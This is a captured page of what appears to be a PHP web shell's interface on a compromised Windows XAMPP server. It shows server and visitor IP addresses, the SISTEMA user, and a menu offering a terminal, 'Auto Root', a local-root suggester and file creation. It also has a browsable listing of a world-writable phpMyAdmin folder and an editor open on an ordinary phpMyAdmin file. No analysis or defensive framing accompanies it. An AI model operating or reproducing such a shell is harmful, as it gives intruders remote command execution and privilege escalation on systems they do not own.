Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.84
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
phpMyAdmin /
Delete
Unzip
Name
Size
Permission
Date
Action
doc
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
examples
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
js
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
libraries
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
locale
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
setup
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
sql
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
templates
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
themes
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
tmp
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
vendor
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
.rtlcssrc.json
20
B
-rw-rw-rw-
2023-02-07 22:26
CONTRIBUTING.md
2.53
KB
-rw-rw-rw-
2023-02-07 22:26
ChangeLog
69.34
KB
-rw-rw-rw-
2023-02-07 22:26
LICENSE
17.67
KB
-rw-rw-rw-
2023-02-07 22:26
README
1.48
KB
-rw-rw-rw-
2023-02-07 22:26
RELEASE-DATE-5.2.1
29
B
-rw-rw-rw-
2023-02-07 22:26
babel.config.json
69
B
-rw-rw-rw-
2023-02-07 22:26
composer.json
5.2
KB
-rw-rw-rw-
2023-02-07 22:26
composer.lock
298.68
KB
-rw-rw-rw-
2023-02-07 22:26
config.inc.php
2.04
KB
-rw-rw-rw-
2024-08-12 16:21
config.sample.inc.php
4.7
KB
-rw-rw-rw-
2023-02-07 22:26
favicon.ico
21.96
KB
-rw-rw-rw-
2023-02-07 22:26
index.php
1.05
KB
-rw-rw-rw-
2023-02-07 22:26
package.json
2.72
KB
-rw-rw-rw-
2023-02-07 22:26
robots.txt
26
B
-rw-rw-rw-
2023-02-07 22:26
show_config_errors.php
1.13
KB
-rw-rw-rw-
2023-02-07 22:26
url.php
965
B
-rw-rw-rw-
2023-02-07 22:26
yarn.lock
247.17
KB
-rw-rw-rw-
2023-02-07 22:26
Save
Rename
<?php /** * Simple wrapper just to enable error reporting and include config */ declare(strict_types=1); if (! defined('ROOT_PATH')) { // phpcs:disable PSR1.Files.SideEffects define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); // phpcs:enable } // rfc2616 - Section 14.21 header('Expires: ' . gmdate(DATE_RFC1123)); // HTTP/1.1 header('Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'); header('Pragma: no-cache'); // HTTP/1.0 // test case: exporting a database into a .gz file with Safari // would produce files not having the current time // (added this header for Safari but should not harm other browsers) header('Last-Modified: ' . gmdate(DATE_RFC1123)); header('Content-Type: text/html; charset=utf-8'); // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); // phpcs:enable require ROOT_PATH . 'libraries/constants.php'; // issue #16256 - This only works with php 8.0+ if (function_exists('error_reporting')) { error_reporting(E_ALL); } /** * Read config file. */ if (is_readable(CONFIG_FILE)) { /** @psalm-suppress MissingFile */ include CONFIG_FILE; }